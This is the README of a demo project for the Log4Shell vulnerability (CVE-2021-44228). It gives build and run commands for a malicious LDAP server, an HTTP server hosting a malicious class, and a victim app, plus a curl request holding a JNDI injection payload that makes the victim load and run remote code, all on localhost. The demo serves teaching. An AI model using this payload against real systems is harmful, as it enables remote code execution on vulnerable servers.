Demo Project for the Log4j vulnerability.
Demo found here:
To run the demo see https://youtu.be/JYiagUpmxXo (German)
- Install a Java SDK. It works e.g. with Oracle SDK Version 8 or OpenJDK Version 11
- Clone this project:
git clone https://github.com/predic8/log4j-log4shell-exploit
- Go into the folder:
cd log4j-log4shell-exploit
On Windows use mvnw.cmd instead of ./mvnw
1.) Build the project:
./mvnw package
- Start the LdapServer:
/mvnw exec:java -D"exec.mainClass"="de.predic8.LdapServer"
2.) Start the HttpServer:
./mvnw exec:java -D"exec.mainClass"="de.predic8.HttpServer"
3.) Start the victim:
./mvnw exec:java -D"exec.mainClass"="de.predic8.Opfer"
4.) Use curl or your browser to invoke the following URL:
curl "http://localhost:8000/hallo?name=$\{jndi:ldap://localhost:10389/cn=badcode,dc=predic8,dc=de\}"
The victim application will write into its log and the ldap query will be executed. The result of the Ldap query will make the victim loading the malicious class from the HTTP server and executing it.
Please be aware that even hacking attempts are illegal!
just a test for CVE-2021-44228